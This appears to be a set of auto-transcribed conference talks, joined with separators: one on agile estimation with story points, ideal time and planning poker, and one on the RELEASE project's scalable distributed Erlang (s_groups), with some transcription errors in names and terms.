gave me your estimate in the precision of days. If instead you tell me 24 hours, I'll be there in 1440 minutes. Wow, you're going to be pretty precise. I might cut you slack 15 minutes plus or minus. Right? So how we convey an estimate tells us something about our confidence in that estimate. How long to read Harry Potter? Two weeks, how many hours? 12 hours? 52 hours? Yep. It depends. It depends on a lot of things. It depends on why we're reading it. You're not reading this for pleasure. You're doing the final copy edit on it, making sure all the commas are in the right place. It would depend on that. It could depend on whether you're reading it in the original Latin or not. Wouldn't Harry Potter one of the original Latin classics? Actually, I looked at that. You can buy Harry Potter in Latin if you're interested. I don't know why you would be, but somebody bothered to translate it into Latin. What we did there with a couple of real world estimating things is probably this. On one of those, you might have thought about a comparison. You looked at the last Harry Potter book and said, you know what, I haven't read that one yet, but it's like the sixth book. It's like the earlier book. It's a little bit longer than the previous book. Now remember reading the previous book, it took me about 12 hours? This one's probably about 14 hours. Or you might have thought about Paris and said, well, I've never driven to Paris before, but I do remember driving to Vienna a few years ago. Based on that drive, my drive to Paris would be such and such amount of time. This is called estimation by analogy, estimation by comparison to something else. The other thing you might have done is you might have thought about, for example, the number of pages in Harry Potter, the number of kilometers to Paris. I'll just make it easy with the math. You might have thought about Harry Potter and said 600 pages. I bet we read 40 pages per hour. I'm done in 15 hours. 600 divided by 40 is 15. This would be thinking about the size of the work. The reason I wanted you to do those two things was to stress that with real world things, we do not just jump in and give an estimate. We think about the size of the work. You thought about the number of pages or you thought about the number of kilometers to Paris. This is a natural real world best practice way to estimate. On software, unfortunately, when asked how long will it take, we often just go three weeks. We don't think about the size. Because estimating the size of software is hard. What we're going to try to do today is to come up with a measure that we can use for size. Something that we can use for size. We've used past ones in the industry. They used things like lines of code in the past. IBM actually really did it in the 60s. They gave a bonus to the programmer who wrote the most lines of code. Nice idea. You think of that. But wouldn't you catch yourself like two minutes later and go, oh, that won't be good. They actually went through with it. Gave a bonus to the programmer who wrote the most and you can imagine what happened. They got a whole bunch of code. So they didn't do any more than less code would have done, but they got a lot more code. So what we're going to try to do is we're going to try to estimate the size of our project and then separately derive the duration. This to me is fundamental. If this one hour session, if I get you four words to remember four words, those are the four words on top of the screen. Estimate size, derive duration. Treat these as separate steps. How long will it take to read Harry Potter? Step one at 600 pages. Step two, divide. Estimate the size from that derived iteration. As an example, I'm going to introduce a unit for this in a moment, but before I introduce the unit, let's just think about something silly. Put the spec on the scale and weigh it. We got a very heavy spec here. We run a sprint. We finished 20 kilograms of spec. We'd look at that and we'd say we have 15 sprints or iterations to go. Just using this because I didn't want to introduce the unit yet. The unit that I want to introduce for doing this is going to be something you might have heard about, story points. In the past, we've used other things. In the past, we've used things like I said. We've used lines of code. We've used function points. Agile teams use different units. Agile teams use story points and ideal days. Those are the measures we use. Story points is the one I want to focus on. Story points are the better of the two units. I want to focus on story points. Story points are a measure of how long something will take. Story points are absolutely a measure of time. A lot of teams make story points harder than they should be by making story points about complexity. They will say we're going to estimate complexity. They might even rename story points. They'll call them complexity points. I can assure you story points are not about complexity. complexity is a factor, complexity influences the amount of time something takes. But what we're estimating is how long something will take as influenced by things like risk, uncertainty, and complexity. Risk, uncertainty, and complexity influence it, but they are not what we estimate directly. Let me give you an example of story points using something different. Suppose we go outside and I point to a building over here and I say that building over there is one unit away. Not one mile, not one kilometer, not one minute, just one unit of time away. Not a trick question. I just want to make sure we're all okay with that so far. Everybody okay with me calling that randomly pointed to building one unit away? Just a number. Call it 100 if you wanted. I'm going to call that building one unit away. Now I point to another building and I say that building over there is two units away. That building is twice as far away. It's going to take twice as long to get to. I'm going to call that two units. Now what's nice with this is you and I can agree. You and I can agree that that building is one and that building is two. Even though we're going to walk there at different rates. You are going to walk there very quickly. I broke my leg and I have to hobble over there on some crutches. It's going to take me a lot longer to get to that building than you. But you and I can agree. That building's a one. You're looking at that building thinking it's a five minute walk. I'm looking at that building thinking that's about a ten minute walk. On these crutches that's about a ten minute walk. But you and I can agree to call it a one. And that one is a two. If we tried to use time think about what would happen. I'd point to that building and I'd say it's a ten minute walk. And you would tell me I'm crazy. You would say it's a five minute walk. We'd argue five ten five ten five ten we'd both be right. There's nothing literally nothing we can do to agree because we're both right. It is a five minute walk for you. It is a ten minute walk on my crutches for me. When we use an abstract unit we can agree. I want to put a building behind me. There's a third building back here behind me. The building behind me is physically the same as our two point building. So I kind of want to call it a two. It's the same physical distance as the two. But in order to walk to the two point building there's a train track that goes by. And I have to wait for the train to go by. And sometimes the train goes by at two o'clock. Sometimes at three o'clock. Sometimes at one. Sometimes it doesn't go by at all. Sometimes it's a short train. Sometimes a long train. There's extra risk or uncertainty in getting to that building back there. So when I think about that building I want to call it a two. But I have this extra risk or uncertainty and that makes me adjust my estimate up. I call it a three because of risk or uncertainty. Complexity can be a similar effect. I'll give you a complexity example in a moment. So what we're estimating is still and always time. How long will it take? But we use an abstract unit that lets people who produce at different rates agree. We do this with currency. I landed here on Saturday. I went to an ATM. I put my card in. I got some money out. What's a 50 worth here? What's a 50 worth? Half of a hundred. Right? Right? Two bottles of water maybe. I bought a couple of bottles of water this morning so if I got thirsty while talking and there were 60 for the two bottles of water. So a 50 is worth half of a hundred. A 50 is worth a fourth of a 200. A 50 is worth what you can exchange it for. It's a relative unit. I can't show up. I assume I can't show up. We can't do this back in the US anymore. I can't go show up at your central bank and go give me the gold. Used to be able to do that. Now it's just kind of a random arbitrary unit of exchange. It's got a benefit of a couple billion people around the world can agree on what a Kroner's worth but it's essentially this abstract unit of value. Just like a story point is. Story point will never have billions of people agreeing on it of course though. Let me give you an example of complexity. I got this example from a class. I love this example. Suppose you have a two person team, a brain surgeon and a little kid. You have a two item product backlog. Perform simple brain surgery, lick a thousand stamps. If we make a simplifying but valid assumption the right person for the job will do the job. The surgeon will do the surgery. Those two things are chosen to take the same amount of time. The brain surgery, the lick a thousand stamps are going to take the same amount of time. If that's true and if we make the assumption that the surgeon does the surgery those two things get the same number of story points even though one is dramatically more complex. Story points are not about complexity. Complexity is an influence. Uncertainty is an influence. Risk is an influence. But they're not will be estimate. We're estimating directly is time. This has to be true because if you're like me you've never had a boss come up to you and say hey I don't care how long it's going to take but I'm worried about your brain. How hard are you going to have to think on this project? Your boss doesn't ask you that. Your client doesn't ask you that. Your boss or client wants to know how long it's going to take. So complexity is a factor but an influence is how long something is going to take. It's a factor in the effort. Story points are weird. So I want you to do something even weirder. Here's the weirder thing I'd like you to do. I'd like you to estimate eight zoo animals for me. And again don't cheat and look them up on Google. I'd like you to just talk about these in some groups again because it's more fun if there's a couple of us arguing the positions here. So in groups just take a few minutes. Estimate these animals in zoo points where a zoo point is a combination of mass and volume. Somehow how much animal there is. How much giraffe there is. Take a few minutes estimate in zoo points. There's nothing she's just doing. It's not least a little bit further. Okay, let's go ahead and talk about these. Anybody got good numbers that I can use for our example here? Somebody get through all or most of these? Somebody's got to help me out. Somebody got some numbers? So I heard a 100 for which animal? So a 100 on...I didn't have the zebra on the list. Oh, didn't I bring up the list? Well, that kind of sucks. Let's just do it out loud together then. Oops. I'm not looking at what you look. I got you a different presentation up here. And it was up on mine. It must have been off by one on the slide. I'm sorry. Somebody give me a number for a lion. What do you think on a lion? A five? Let's go with five on the lion. First number I heard. What about a kangaroo then? If a lion's a five, what's kangaroo? Kangaroo about two-thirds of a lion? You never see them together in the zoo, do you? So...is that a little too low? Let's go with it. Five and three for now. What about rhinoceros? Eight? Is rhinoceros about a lion plus a kangaroo? I think they're bigger. Fourteen I heard. Fourteen to be about three lions? They seem bigger to me. So, well, let's go with the fourteen to start with. What about bear? Who's got a number for bear? What kind of bear? And somebody yelled out six. I gave you a vague requirement. With bear, I gave you a vague requirement. When you have a vague requirement, the best thing to do is ask what kind of bear. Or, if your product owner or your key stakeholder doesn't know what type of bear doesn't know the answer, the best answer is to use a range. I don't know. Maybe we're going to put a koala bear in the zoo. Maybe we're going to put a big ice bear in the zoo. This could be anywhere from two to fifteen. So, using a range. What about hippo? I'll jump down to hippo. About the same as a rhino. So, whatever we'd settle on for a rhino. I actually looked those up at one point. And technically, hippopotamus a little bit bigger. But I'm going to look at those and say, you know what, close enough, let's just call them the same size. Now, let's go with, let's say hippo is a twenty. Let's say rhino and hippo are twenty. I realized I missed one on here. What do you want to put on a blue whale? A couple of thousand. A couple of thousand? Right? That might be pretty close. You break it down. This is where I was worried the World Wildlife Fund is going to walk by. There's a guy there who's going to break down the blue whale. Let's get him. So, yeah, I'd want to break that down. It's too big to estimate. We are good estimators. We get a bad reputation for estimating. Software people, humans in general, kind of bad at estimating. We're not too bad if we stay in a one to ten range. When we start to get out of that range, that's when we're really bad. You and I could go to a zoo and look at a hippo and a rhino and go, a little bit bigger. We could get a lion and a tiger and look at those and decide pretty well. When we look at the blue whale, that's going to be hard. It's not going to be in that one to ten range. Think about walking into the reptile room at the zoo. You're looking at some little snake. How's that snake compared to the zebra? It's going to be hard. One to ten range? We're pretty good. Meaning most of our product backlog items, we're going to want to keep them in a one to ten range. Suppose I gave you another zoo animal up here. If I gave you cheetah or jaguar, I don't mean the car. If I gave you cheetah or jaguar, the way you would estimate those is you would look at your backlog, you would find something similar, probably tiger or lion, and you'd estimate relative to that. You'd go, okay, a cheetah's a little bit smaller than a lion. You'd pick a number based on what you gave lion. This is called relative estimating. Relative estimating is hard to get started with, but it gets easier as we go. It gets easier as we go because what you're doing is you're looking for things that are similar. What's like this? We don't have to go back to kind of first principles and break something down into all of its steps. We just have to say, what's it like? I have no idea how much a lion eats in a day, but if we are planning the trucks that are going to deliver food to our zoo, I'm okay making an assumption that a lion and a tiger eat about the same. They look about the same, kind of similar animals. I bet those things eat about the same. We can just call those the same number. These are story points. The other type of unit agile teams will sometimes use is called ideal time. Ideal time is much easier than story points. Ideal time is how long something is going to take if three things are true. It's all that you work on, nobody interrupts you, and everything you need is sitting on your desk when you get started. Meaning there's no waiting time, no interruptions, you're entirely focused. We call it ideal time because those things never happen. Now, if you think about ideal time, you might think about reading the Harry Potter book. We had somebody yell out, I think, 14 hours. I'm going to read the Harry Potter book in 14 hours. Well, I doubt that that answer meant that I'll be finished at two in the morning. Starting at noon, I'll be done at two in the morning. No, the answer probably meant I will have the Harry Potter book in my hands for 14 hours. I might read for an hour a day. You want to know if it's a good book? Check with me in two weeks. I'll have the book in my hands for 14 hours. Not I'll be done in 14 hours. So there's a difference here between ideal time and elapsed time. I want to give you the best example of this. It's such a great example. I'm going to give it to you even though it's very US centric. I know you're undoubtedly not a fan of my football. You probably like your own football. You don't want a big fan of American football. But if you've ever seen American football for even a minute, you're going to follow this example here. American football has four 15-minute quarters. The clock starts at 15, counts down. So theoretically, an American football game takes an hour. If you've ever started to watch one on television, even a minute of it, you know that it doesn't take an hour. It takes about three or four hours because that clock stops all the time. Now, I need somebody in the room who's not a big fan of American football to help me out with this question. Remember, an American football game has four 15-minute quarters. That would be kind of its ideal time estimate. So somebody who's not a big fan of American football, if I asked you to estimate the amount of time, an ideal time, that my home team's first game of the year is going to take, an ideal time, how long would you say? 60 minutes. Four 15-minute quarters. That's real easy. You don't even have to be a fan. Now, if you really wanted to know how long it's going to take, you'd have to know all sorts of things. In real time, if the team plays a team that causes a lot of injuries, the clock stops when there's an injury. The clock stops when somebody throws the ball and the guy doesn't catch it. Clock stops for all sorts of stuff. If somebody runs out of bounds, the clock stops. They want to sell TV commercial ads. They clock stops. So the clock stopping all the time, you'd have to know all sorts of stuff to tell me that that game is going to take three hours and 27 minutes. Much easier to estimate an ideal time than a lapse time. So when we think about your office, I think you guys have a 7.5 hour work day. I got an 8. So I think about an 8 hour work day. I got 40 hours in the week. But I'm not going to have 40 hours on the keyboard. I might have two hours in meetings, two hours, maybe eight hours in email. Four hours left for the project. So I'm not going to make progress at a rate of one hour per hour. I'm not going to read Harry Potter in 14 hours on the clock. It's going to take longer. So this is what ideal time is about. The big thing to be careful when estimating an ideal time is you've got to be careful what's being asked is what's being answered. If your boss walks up and says, how long to read Harry Potter? And you say 14 hours. You better be sure your boss doesn't expect you to be done in 14 hours. You better be sure your boss knew that that was an ideal time estimate. That will only take me 14 hours. But I'm full time on this other project right now. I won't be able to get to it for two weeks. So it's often the case that what's being asked is not what's being answered. I like story points. I think there are a couple of compelling advantages to story points. Story points are additive. Time based estimates are not if we produce at different rates. If you and I walk at different rates, we cannot add your five minute estimate to my ten minute estimate. You're estimating in your time. I'm estimating in my time. They're not the same unit because we produce at different rates. With story points, we can. We can add story points because they're relative. The story points also help avoid problems that get introduced into projects where teams will confuse hours, days. They'll mix up their units and it leads to problems. I want to show you an example of these confusing units. So here's a team back to our original picture this afternoon when we first started the session. The team has estimated their product backlog in hours and they've estimated their sprint or iteration backlog in hours. This team has hours for both of those. They're stories and they're tasks. Here's what's going to happen. They're going to run a sprint and they're going to do all those tasks on the right. Then someone is going to say, when will you be done? I want to know when we're going to be done with this project. Well, the way we're going to figure out how we're going to be done with this, we're going to add up how much work we've got left. So I can't see the slide up here, but we're going to add up the 100 of the hours over here. There's 140 hours left. 50, 50, 20 and 20. 140 hours left. We've got 140 to go. Well, how much did we do last sprint? Well, let's add up what we did last sprint. We add up what we did last sprint. It was 35 hours over here on the right. 12 plus 8 plus 4 plus 6 plus 5 is 35 hours. Now, I've made up the numbers here to make the math easy, but this example is realistic. I see this all the time. The math here is made up. So we're going to say 140 hours to go. We finish 35 hours per sprint. We'll be done in four sprints. 140 divided by 35 is 4. We'll call that 35 our velocity and we'll say we're done in four sprints. There's a big problem with what I just did there. There is a huge problem with what I just did there. I mixed up units. Let's not call these hours. Let's call these on the left. Hours we pulled out of the air. The team did not spend a lot of time doing that estimating. They just took a couple of minutes on average to estimate their user stories. So those are hours we pulled out of the air. Sprint planning takes a lot of time. So let's call these hours we thought a lot about. I cannot take 140 hours we pulled out of the air and divide it by 35 hours we thought a lot about. They're different units. They're different units. I like how philosophers talk about knowledge. Philosophers split knowledge into two categories. They talk about what they call a priori knowledge, knowledge without experience. Before I have experience, here's what I think. That would be those things on the left. I don't have any experience doing these things. We haven't built them yet. So a priori, those are my estimates. Philosophers talk about a posteriori knowledge. Knowledge with experience after I get experience. The 35 hours over here are knowledge with experience. Now look at the first user story. It was 30 hours. When we planned it into a sprint and we did the sprint, it turned into 35 hours. We need to be careful and do the math the right way. The right way to do the math here would have been 140 hours divided by what? Somebody got an idea? By 30. I should have divided 140 by 30. I should have used units all from the product backlog. Dividing it by here is kind of mixing up the units that we use. So I want to take 140 hours and divide it by 30. In which case I get five sprints. So when I see this on projects, I do all the time, these projects are one to two sprints late. Because they tend to use this over here as their velocity on the right, and that gets overstated. If we used story points, I'm just going to make these smaller numbers. If we use story points, no one's going to make the mistake. They're not going to say, well, when are we done? Let's add it up. We got 14 story points, five plus five plus two plus two. What's 14 story points divided by 35 hours? I don't know, I can't do that math. 14 points divided by 35 hours doesn't make sense. So this will lead teams to doing the right math. 14 points divided by three points will be done in five sprints. So I like using different units on the product backlog. We put numbers on the product backlog in story points. When we go into sprint planning, if they're on the right, that teams will do in hours. So we're going to do different units. We're going to practice estimating slightly different way. We saw that we passed around a bunch of what are called planning poker cards earlier. We're going to use those. I want to have you guys get a chance to practice something. So we're going to do this with a technique called planning poker. Planning poker is a consensus-based estimating approach. It involves a product owner showing up with a stack of items, reading those items to the team. Team members asking questions. The product owner answers the questions. Team members have cards. On those cards are numbers that we're going to use. We use cards because that prevents us from using every number. I don't want to get in an argument with you. 17 versus 18. Those two numbers are too close to one another. We can't tell a 17 from an 18. So let's use cards that have on them the numbers that we've agreed to use. So our product owner reads a story. The team members ask questions. As soon as everybody thinks they have an answer, they hold their card up. Don't show it yet because that will influence your teammates. Just pick your card up. Normally a scrum master or coach, somebody will say one, two, three, turn them over. We turn them over. We all got the same number. Write it down. We're done. If we don't all agree, vote again. Here's an example. I get these four estimators. We get two fives. Yeah, there's my favorite team, my inmates. We get two fives and eight and a 20. If we had those numbers, I would ask Johannes, why a 20? Why do you think this is so much bigger than the rest of us? Anna or Tron could comment, but I really want to hear from Johannes. We vote again. Maybe he says something to influence us. Everybody else comes up to an eight, but he's still got a 13. We still differ. I would ask him to take another round or two trying to convert us. Help us see why you think this is bigger than the rest of us think. We don't vote. We don't at this point say the eights win. I repeat this process until we come to agreement. I want the team to come to agreement on this. The agreement might be a little false. Johannes does not have to go to his grave defending an eight, but I need him at some point to either convert the other team, the rest of the team, or I need him to fold. I need him to say, okay, I don't have any more arguments. I need eight versus 13, not a big difference. I fold, I'll go with an eight. So I want him to fight a few more rounds, but I'd eventually want him to fold and go with the rest of the team on this. If he can't convert them. You guys ready to practice? Okay, I passed around sheets of paper at the start of our session here. If anybody doesn't get it, let me know. We can get more passed around. Hopefully there's some floating around. I'll keep it up here on the slide up here too, and it is up there this time. Here's a product backlog for you. You've got planning poker cards. Here's what I recommend you do. In groups, we've got to do this in groups so we have discussion. Look for a two. No planning poker, just look for a two. Once you've found a two, look for a five. Maybe you don't find a two and a five, you find a three and a five, or a three and an eight, but I want you to find two numbers that start to span our one to ten range. Remember we're only good one to ten. So look for two numbers that span the one to ten range, then play planning poker on a few more of these. So look for a two and a five. After you've done that, play planning poker. We'll talk about this for a few more minutes afterwards. So give it a try. Need more cards or handouts, let me know. And I do encourage you to do this in small groups. So you get the benefit of this and get a feel for what this is like. All right. So that's it. Thank you. Have a great day. Bye. Paul We are pretty much close to done though. So I just kind of, we're kind of at the end here. I want to see what type of questions you have from doing that. Any thoughts on estimating? We haven't done anything in terms of putting this together into a plan yet. Right? This session was on estimating. If you go back to early slide, we had estimate size-derived duration. We've estimated the size. We haven't derived the duration yet. We're going to do that in the next session I've got in here. It starts in an hour. We'll talk about how to turn this into a plan. I want to pause here for questions you might have on the estimating side of this. Makes sense here with story points being about time. Yes, question or comment? So an estimate is going to be dependent to some extent on who does the work. We're going to want to make an assumption on an agile team that when we go to sequence the work, when we go to plan the work, sprint planning, iteration planning, then we're going to do the best we can there to have the right person doing the job. So if you're our JavaScript person, we're going to have you do the JavaScript stuff. I'll do the database stuff. So that becomes kind of a sequencing issue. At this level, all we're really looking at is kind of the overall size of things. The problem that we may run into from that is that we say the size of the project is this big and we think you and I together can go to a certain pace, but it turns out we can't because all of this is JavaScript work. So the problem you're describing is really going to be a sequencing issue that we can handle during sprint planning unless all of our work is really skewed in one direction. Well, so the comment is we want people to get cross trained. I want the JavaScript guy to learn Oracle the other way around. Absolutely taking people outside of their skill and to learn new skills is a very valuable thing that is going to help us be better as a team over the long term. In terms of does it matter when we put an estimate on there who's going to do it? It really doesn't at the level of estimating because you are a fast walker. I'm a slow walker because of my crutches, but we established that you and I can still call that building a one and that building a two. What's going to matter is if I, the slow walker, walk to that building, it's going to take me twice as long. But that's going to free you up our fast walker to walk to some other building. Assuming there's one skill set walking to buildings, JavaScript, whatever it is. So in terms of the size we put on, it's not really going to matter who does the work. It's going to matter only when we go to actually sequence the work that we make sure the right person for the job does the job. At the higher level, putting a size on it, that doesn't really matter. In fact, that's the main benefit of story points is that it doesn't matter who's going to do it because people with different skill sets can agree that building's a one, that building's a two. That to me is the fundamental benefit to story points. Does that make sense at all? Let me try it another way. You and I are going to program something. We're both programmers. We're both programmers. We're going to program something. In technology A, you're better than I am. In technology B, I'm better. But you and I can look at this one thing and we can both think about how long that's going to take. If we thought about something else, in that same technology, we would both say it's going to take twice as long. The fact that story points are grounded in time, the fact that they're about time, is what allows you and I to think about it in terms of our own skills, but still put a common unit on there. Maybe we can talk about it during the break, but I don't want to keep everybody on it. The key benefit is these people with different skill sets. We can maybe draw one out on a piece of paper to see the example. The idea is going to be with different skills, whether it's walking, JavaScript, whatever. If two people can look at something and say, this is easy, the JavaScript programmer that's good, the JavaScript programmer that's bad, can both look at that and say, that's a pretty easy JavaScript thing. The easy guy thinks it's going to take minutes. The hard guy thinks it's going to take hours, but they can both agree it's easy compared to the hard JavaScript thing, which would allow two people with different JavaScript skills to put a one on one and say a five on the other. Now it becomes a sequencing issue. I want the good person to do it, if available. I don't need to go to lunch right off, so I can hang around and take some more one on one questions. Let's go ahead and end there because we are at the official lunch time. Let's go ahead and end there. If you're interested in how we put this together in a plan, hang around an hour from now. We'll talk about putting this into a plan. Want more planning poker cards or other stuff I've got all up here? Help yourself. We'll talk about more planning poker cards.
|
The first step in creating a useful plan is the ability to estimate reliably. In this session we will discuss how to do this. We will look at various approaches to estimating including unit-less points and ideal time. The class will present four specific techniques for deriving reliable estimates, including how to use the popular Planning Poker® technique and other techniques that dramatically improve a project's chances of on-time completion.
|
10.5446/50850 (DOI)
|
Hi, I'm Natalia and thank you for coming. Thank you for watching. And I suppose we'll start, right? So I'm Natalia, I'm from the University of Glasgow and today I will talk about the release project, the work we do there. So the project is European and it involves something like eight partners. These are five academic partners from the UK, Sweden and Greece and three industrial partners. These are EDF, Ericsson and Erlang Solutions. In particular I will talk about the work we do at Glasgow University together with Kent and Harriet Ward Universities. So I will give a brief introduction of things we do at what the release project aims in general. Then I will talk about the scalability limitations of distributed Erlang and then we'll cover what we do to scale it. So I'm not aiming to give all details but just a flavor of what we do, why we do that and how. So the purpose, the aim of the release project is to scale the radical axiomodel to build reliable software on massively problem machines. And by that we mean something like 10 to 5 cores. And for that we use Erlang. We work on three levels. So the first level is VM, then we have language level and tools. Today I will talk only about the language level and VMs and tools will be covered sometimes by different people in different talks. So typical hardware architecture, what do we mean by that? Well, we're thinking about a cloud and actually a collection of clouds, something like it's called Sky. And then clouds consist of hosts and then hosts, they consist of SMP modules, something like 6, 8 and each cell would have something like 100 of those hosts and each SMP would contain 32, 64 cores, something like that. And then Erlang, just briefly reminding you what it is. So Erlang is a functional general programming, general purpose programming language designed at Ericsson. It is dynamically typed and it was specifically designed to build distributed, scalable, software time and massively concurrent software. And then it uses these two main philosophies, which is let it crash and the second one is share nothing. The language primitives are processes and the particular very nice thing about it is that concurrency is built in in the language rather than edit on. So distributed Erlang, what's it about? Well, we have a number of nodes and those nodes, they can be right. And those nodes, they can be either on the same host, they can be on different hosts and these yellows are nodes by the way. Well, by node I mean Erlang VM. And then inside of those, we have those processes and each node, it can share a number of cores. When Erlang works in its normal mode, it means the connections are transitive. So all nodes are interconnected and they have a global common namespace. But that I mean that if we register a name on one node globally, I mean, then it will be transitively connected, transitively shared between all nodes. And if we add another node over here, it immediately as soon as we connect to one of the nodes, it will be connected to the rest of the nodes. And then it's about explicit placement. So to spawn a process to a different node, we need specifically define which node that is. And of course, Erlang and distributed Erlang is about reliability. So if one process, one node crushes, we can detect it and restart the system. So here we have a benchmark, it's a bash a bench code. So what we do is, oh my God, so we have 20 nodes, then within 18 seconds, we just kill all those process. And the system again is in a stable state. Then we start all those nodes again and system in a stable state again. But it has limitations. So we run this experiment and it's again bash a bench. Well, it's a modification of bash a bench, we call it D e bench. So what we do here is that we have a scale number of nodes, so from 10 to 100. And then we look at the throughput. And then we vary the number of the percentage of global operations that we have. So the red one is zero global operations. But then as soon as we start, you know, even this tiny, tiny number percentage of global operations, the scalability goes down. And that is when we used global module, but global operations are not only about global module. You can also use something like RPC column multiple nodes and then you will get again global operations. Another problem is with single process bottlenecks. And we can get here. So this is React benchmark. React is a DBMS system built in the Eulang. And so we look at scalability again. And here we have number of nodes. This is number of VNs, Eulang VNs. And then we scale them from 10 to 100. And then we look at throughput again. And what happens is that we have quite nice scalability up to 50, 60 nodes. And then it stops. And then it goes down with huge variation. And by the way, this is React version 11. So it was something like a year, half a year ago, one half a year ago. So they updated, they modified some things there. But the problem there is that first we have this single process bottlenecks. And another problem is that this fully connected network that we get with distributed Eulang. So design approach and principles. So we need to scale. To scale a system, to scale a program, we need to have a scalable persistent storage. And that we left to React and Xandrum. And then we need in memory data structure. And that's in Eulang, these are at stables. And this work is done by Sally University and Ericsson within the release project. And then we need a scalable computation. And that's our work. When thinking about how we want to scale it, we took as a baseline those principles. So first of all, we wanted to work at Eulang level as far as possible. Then we wanted to do those modification minimal because language is nice. Language is simple. And people love the language. And we didn't want to introduce something absolutely foreign that the Eulang community would just reject and say, no, we don't like it. It's not our philosophy. Of course, we wanted to follow the language philosophy. And then we wanted to keep the Eulang reliability model unchanged and as reliable as it is now. And then there are two things that we want to change. There's a avoid global sharing, as showed on the previous slide, and introduce an abstract notion of communication architecture. So what is SD Eulang? SD Eulang is a small, modest extension to distributed Eulang. And here we tackle two problems. The first one is network scalability. We want to use all to all connections. And the second one is semi-explicit placement. And I will talk about those two problems in details now. So network scalability. And scalable distributed Eulang, we have two types of nodes. These are free nodes. These are nodes that belong to node S groups. And another one is S groups nodes that belong to at least one S group. And so nodes in S groups, they have transitive connections. And they, so nodes within the S group, they have transitive connections within the group and non-transitive connections with the other nodes. And then if you're familiar with distributed Eulang, you can say, well, there are similarities with global groups. Yes, there are. And these are similarities that groups have their own namespace and they have transitive connection within the groups. But the difference is that the groups are overlapping. And so we don't partition them as global groups. And then the information about S groups and node is not globally shared. So let's look what happens here. So we have distributed Eulang and assume that we have two groups of nodes. So these three nodes are connected and these three nodes are also connected. Then we decide to connect nodes three and four. And what we get is a fully connected network because of the transitive connectivity. And then we look at S groups. So we group nodes. And when we connect nodes three and four, they're just connected. Connections are non-transitive and each of the groups has its own namespace. The types of connections in general, what we have. So the thing is that we don't aim to replace the existing connections and existing nodes in distributed Eulang by those groups. So if a programmer doesn't want to use them, that's fine. But if they want to use them, these are means to introduce them and communicate with other nodes. So first of all, we have these three nodes and these are free normal nodes that have transitive connections, common namespace, the connections are normal. And then we have hidden nodes. Those hidden nodes, they each node has its own namespace. So if we register something globally, it doesn't actually change much because this information is not going to be shared between other nodes. And also, they don't share connections. So they just form direct connection and don't share them with anything. Then we have S groups. So nodes are interconnected within S groups and they have transitive connections within that S group and have non-transitive connections, the rest. And here we have the same. So another question that we thought of, of course, and we often ask, so why do we use S groups? Why group nodes into those S groups? Well, before introducing them, we had some requirements. We wanted those S, we wanted nodes to join and leave us groups very easily and quickly. Then we wanted to keep the philosophy of the language. That is, each node can be connected to any other node. And then we wanted that to be simple. And we looked at three other mechanisms, so something like grouping nodes according to their hash value. But that imposed some restriction on, so if a node joins an S group, then it should change its hash value. And when it leaves an S group, it should also change its hash value. And it belongs to multiple S groups. There's again this contradiction of the hash value. So we decided to avoid that. And then another approach would be a hierarchical structure. But again, it contradicts the philosophy because in this case, node from different levels, they can't communicate directly to each other because it's just, so we decided to introduce overlapping S groups. And using these overlapping S groups, we can implement actually all other three approaches. So this, how can we group nodes? We have a set of nodes and then nodes are grouped into S groups. And one of the nodes, we can call them gateways, for example. They form another subgroups. And then gateways to those upper levels, they can form another S group. So if node A wants to communicate to node N, what happens is node A communicates to B, B communicates to D, E, F, and then it's N. So nodes actually don't form a direct connection to each other, but go through this gateways. We can also communicate, introduce something more complicated and introduce redundancy in the hierarchy. So instead of having one gateway node, we can have two in case one of them will fail. And then we can also communicate with free nodes and we can either connect them or don't connect. And they will have non-transitive direct connection to the nodes in the S groups. And then another approach. Well, we can have embedded. If we don't mind nodes to be interconnected, but we want to reduce this global space, we want to localize it somehow. Well, we can introduce embedded groups where nodes, they just share connection within their groups. So we can register names here and register names here. Then all names in this group will have that name or have all of those nodes. And how we can use those. So we can either start all that configuration at start. And in this case, we will use configuration file or we can start dynamically using this new S group function. And we can use it either with one parameter, defining the S group name or not defining it. In this case, the S group name will be generated automatically. And this is done because we don't guarantee the S group's names to be unique. So we don't collect this information anywhere. And in this case, what we do is that what we guarantee is uniqueness, high probability of name uniqueness. So not uniqueness but high probability of its uniqueness. And other function we can use. So creating new S groups, deleting S groups at nodes and removing nodes. We can also collect some sort of information that we want. So information about S groups, information about the particular nodes to which nodes it belongs to, to which, sorry, S groups it belongs to, to which, with which node it shares namespace and so on. And these are the first measurements that we did with this. So this is, sorry, what's that? Good, yes. That's good, it works. Yes. So we have this tiny percent, 0.01 percent of global operations. And we compare distributed Erlang and SD Erlang. And we have from 10 to 100 nodes. And we look at the throughput. So SD Erlang helps. That's a good news. And so to look how actually SD Erlang works, we'll look at an example of orbit. So what is orbit? Obit is a symbolic computational kernel, a generalization of transitive closure computation. So what it is? We have initially given space and then we apply a list of generators on this namespace. And from this, we generate a new list of, create a new list of numbers. And this process is repeated until no new numbers is generated. So that's the program. And we'll look how we can, how starting with non-distributed Erlang, we can come to scalable distributed Erlang, how can we build this program? Right. So the first question is, so why orbit? Well, because it is similar to React and other hash DHT, distributed hash table, no SQL database systems. So another one is, it uses peer-to-peek connections. And the third reason, well, it's very small and it's easy to understand. So we're starting to go into deep details of complicated programs. So we have this non-distributed Erlang and this is one node. We have one node and we have this master worker table and credit. So what happens is that we have a hash table and master process. It spawns the first worker process. The worker process has just one number. And then we apply some generators on it and it generates a list of numbers. So what we do with this first number? With this first number, we check whether it's already in this table. If the name is in the table, the number is in the table, then it just returns the credit to the master and it dies. If it's not, then it puts the value in the table, generates a new list and we repeat the process again. To do it, it's distributed. What we need to do is we need to a little bit modify master and worker modules. So what happens now is that master and workers, they are on different nodes. And worker nodes, they contain these distributed hash tables. So table is now not on one node, but it becomes distributed. And master, it again spawns a process, for example, to node one. But the node is defined by the value. So what we do is we have this first process. We take a hash value and this hash value defines to which node we are actually spawned the process. For example, we spawn it to node one. And then we check whether the number is already in the hash table. If it's there, then the process just dies and returns the credit to the master. And if it's not, then it generates a new process and this procedure repeats. And now we have Scalable distributed. So why we want to change it? Well, because the problem grows, right? So we can have massive, massive requirement for this orbit. And it's not possible neither for one node, neither for 60 or 100 nodes to solve this problem anymore. So we want it to scale. And for that, we use Scalable distributed error. So it's again, what happens, we have this master node, but now we have this submaster node. But the hash table is still kept on those worker nodes. So master generates the first number and then it decides, it takes the hash value and decides to which node actually it should go first, to which to spawn. For example, we want to go to group one. And then from this group one, when it rhymes there on the first submaster, it takes the second hash value. And from here, it decides to which other node to go to. And then again, a trip it. So here we need to modify master, worker again, and add to new group, to new modules. These are submaster and grouping. Well, 